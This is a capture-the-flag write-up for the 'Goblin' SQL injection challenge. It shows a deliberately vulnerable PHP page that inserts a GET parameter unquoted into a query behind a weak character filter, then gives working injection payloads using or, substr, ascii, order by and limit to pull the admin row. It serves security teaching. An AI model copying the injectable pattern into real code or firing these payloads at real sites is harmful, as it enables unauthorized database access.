# **Goblin**
## 1. What will we learn from this problem?
This problem wants to make sure you can use **many SQL Functions**      

## 2. Analize codes  
    <?php 
      include "./config.php"; 
      login_chk(); 
      dbconnect(); 

      if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
      if(preg_match('/\'|\"|\`/i', $_GET[no])) exit("No Quotes ~_~"); 

      $query = "select id from prob_goblin where id='guest' and no={$_GET[no]}"; 
      
      echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
      
      $result = @mysql_fetch_array(mysql_query($query)); 
      
      if($result['id'])
        echo "<h2>Hello {$result[id]}</h2>"; 

      if($result['id'] == 'admin')
        solve("goblin");

      highlight_file(__FILE__); 
    ?>

### 1. preg_match()
We can't use string like these.(scope : no)  

    prob | _ | . | ()

If we use one of these, we will see 'No Hack ~_~'

There is one more preg_match function.

    ' | " | ` 

If we use one of these we will see 'No Quote ~_~'

### 2. query
Query is this.

    select id from prob_goblin where id='guest' and no={$_GET[no]}

Let's think how to modulate that.

### 3. if($result['id'] == 'admin')
If data which we got from database using query has 'id' field and the value of the field is same with 'admin',
then we can solve this problem.  
    
Then how can we do that?

## 3. Solution  
In this problem, we can't use quote. But that does not matter.  
So, enough we can get the value. then how?

Those keywords are as follows.
  
### Using Keyword  

    or | substr | order by | limit | ascii | etc.....
    
    <There are too many answers to this problem.>

### These are my answers.
    
    ?no=2 or ascii(substr(id,1,1))=97
      
    ?no=2 or 1 order by id

    ?no=2 or no=2

    ?no=0 or 1 limit 1,1
  

### **ascii(char)**
This function will return the ascii value of the parameter which is char type.

### **substr(str,offset,length)**
This function will return the string from offset to length

### **order by {column} {type=asc(?)}**
If we use this function, SQL will sort data by column according to asc. If we want sort in descending order, we can use order by like this

    order by {column} desc

### **limit {offset},{amount}**
This function will cut the rows from offset-index to (offset+amount)-index.  
Start of index is 0, zero. And if we use this like "limit 1", it is same with "limit 0,1"

**Lastly, There can be many answers**

**[Go to see other solutions](https://github.com/moreal/TIL/blob/master/Security/WarGame/WriteUp/los.eagle-jump.org/00.%20ReadMe.md)**